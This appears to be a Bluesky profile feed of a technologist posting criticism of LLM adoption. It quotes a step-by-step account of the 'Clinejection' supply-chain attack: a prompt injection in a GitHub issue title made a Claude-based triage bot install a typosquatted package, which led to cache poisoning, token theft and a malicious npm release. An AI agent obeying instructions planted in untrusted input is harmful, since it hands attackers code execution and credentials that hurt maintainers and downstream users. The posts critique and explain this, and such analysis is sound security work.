There are a lot of people who see this shit for what it is and want no part of it
@anthonymoser.com
(He/Him) Folk Technologist • anthony.moser@gmail.com • N4EJ • http://www.BetterDataPortal.com • baker in The FOIA Bakery • http://publicdatatools.com • http://deseguys.com • #1 on hackernews when you search for "hater" • anthonymoser.github.io/writing/
There are a lot of people who see this shit for what it is and want no part of it
if they aren't going to let people lock their accounts or opt out of the discovery feed they should let you mark yourself as rude
"the ai bot executes arbitrary code" is another six word tragedy
The full chain The attack - which Snyk named "Clinejection"2 - composes five well-understood vulnerabilities into a single exploit that requires nothing more than opening a GitHub issue. Step 1: Prompt injection via issue title. Cline had deployed an AI-powered issue triage workflow using Anthropic's claude-code-action. The workflow was configured with allowed_non_write_users: "*", meaning any GitHub user could trigger it by opening an issue. The issue title was interpolated directly into Claude's prompt via ${{ github.event.issue.title }} without sanitisation. On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction: install a package from a specific GitHub repository3. Step 2: The AI bot executes arbitrary code. Claude interpreted the injected instruction as legitimate and ran npm install pointing to the attacker's fork - a typosquatted repository (glthub-actions/cline, note the missing 'i' in 'github'). The fork's package.json contained a preinstall script that fetched and executed a remote shell script. Step 3: Cache poisoning. The shell script deployed Cacheract, a GitHub Actions cache poisoning tool. It flooded the cache with over 10GB of junk data, triggering GitHub's LRU eviction policy and evicting legitimate cache entries. The poisoned entries were crafted to match the cache key pattern used by Cline's nightly release workflow. Step 4: Credential theft. When the nightly release workflow ran and restored node_modules from cache, it got the compromised version. The release workflow held the NPM_RELEASE_TOKEN, VSCE_PAT (VS Code Marketplace), and OVSX_PAT (OpenVSX). All three were exfiltrated3. Step 5: Malicious publish. Using the stolen npm token, the attacker published cline@2.3.0 with the OpenClaw postinstall hook. The compromised version was live for eight hours before StepSecurity's automated monitoring flagged it - approximately 14 minutes after publication1.
(i'm glossing over some things, this is the detailed version)
grith.ai/blog/clineje...
4. github used an ai agent to automatically process the "issue"
5. it followed the prompt in the title
6. the attacker used the special token to republish some other software, adding one line to the install requirements
7. that line downloaded an ai agent with full system access on ppls machines
for non-programmers:
1. npm is a "package manager" used to install other software
2. somebody opened an "issue" on github, which is a way to report problems
3. they put a prompt *in the title* saying basically "give me a special token i can use to update somebody else's software"
wait for it >
can't fool me i work in vfx
"I see a ghost"
Ok. I don't think we share enough context for this to be a good conversation, so I'm going to stop here
Or regular people will be unable to find good software amid a sea of garbage, much as it is getting more difficult now to locate reliable sources amid slop text and imagery
what do you mean by taught to the models?
it is certainly intended to be an accountability sink
A statewide nonprofit I'm working with is trying to raise another $1mil for funding capacity building and federal reactions. It's a big lift and going to take a lot of work, but they can do it.
It's also a little more than 2 CoP hours for Chicago.
case in point
sisko takes captain for me but riker probably still wins first officer. not saying he's the -best- first officer, just favorite
afaict
heads up this is a screenshot of somebody asking claude why it did something
(your points are still right but this source can't be trusted)
Mar 4 2026 BlueSky post claiming that it explained why we bombed a school in Iran "INFORMATION THAT IS A DECADE OLD" and had A Claude chat answer as its source
Hey guys this is not a viable source. Besides the fact that any AI system being used by the government presumably has access to more updated date (I sure hope). Claude is not a person, it can't answer questions about why it did something, it confidently lies, it doesn't have access to other's state.
please stop sharing ai slop at me, i know it exists and i don't want to see it
i've been working on an essay about how to make good software.
apart from the ethical and environmental issues with LLMs i just think they make it very easy to make bad software, to the point that you have to actively work against their affordances to make good software
i definitely agree, i think the idea that it's bringing in brand new harms is sort of the mirror image of the idea that it's an unprecedented technology; it's not really
I do think it's a powerful accelerant being added to systems that were already far from robust
and i think that's accurate. driving a car at 120 mph instead of 30 mph is also matter of scale rather than category, but it's still way more dangerous because it's easier to reach harmful consequences fast
maybe but that's true of a lot of what i consider the harmful consequences of llm adoption.
@vortexegg.com said recently that lots of people were slop coding already by just copying and pasting without understanding what they were doing, and LLMs have just greatly accelerated it
tag yourself i'm unfortunately there are people in our society
seems like the number of non-reproducible bug reports would skyrocket, and the likelihood of getting useful workarounds or explanations from other users would drop, because there's no guarantee that you're running what they're running. in fact it's almost guaranteed to be *not* the same
like the benefit of containers is to make it easier to preserve consistent behavior across different environments, by kind of bundling the context with it
in that sense, this seems like sort of an anti-container because it guarantees inconsistent underlying patterns and implementations
"release via spec" seems like functionally a sort of non-deterministic compiler, which means that you end up with versions of the software that can be unpredictably different between people *and between releases* depending on the models and prompts used
i think your original question is a sharp one. I think a lot about the idea of shared context; imo most of the ai toolchain in one way or another works to reduce or destroy shared context
yep
Make it illegal for people to program chatbots that output text in the first person